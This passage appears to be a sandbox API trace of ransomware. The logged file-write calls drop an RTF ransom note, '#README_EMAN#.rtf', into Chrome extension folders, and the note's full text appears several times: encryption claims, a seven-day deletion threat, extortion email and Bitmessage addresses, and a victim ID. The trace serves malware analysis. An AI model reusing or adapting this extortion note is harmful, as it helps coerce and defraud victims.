g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.216] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nu y5\x97>\x13¹\x0cgR6÷Æ\x1dáh\x8f\"ûT¹\x9fcN", lpUsedDefaultChar=0x0) returned 8717 [0278.216] WriteFile (in: hFile=0x294, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.216] CloseHandle (hObject=0x294) returned 1 [0278.217] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\#readme_eman#.rtf")) returned 0xffffffff [0278.217] GetLastError () returned 0x2 [0278.217] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0278.217] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r 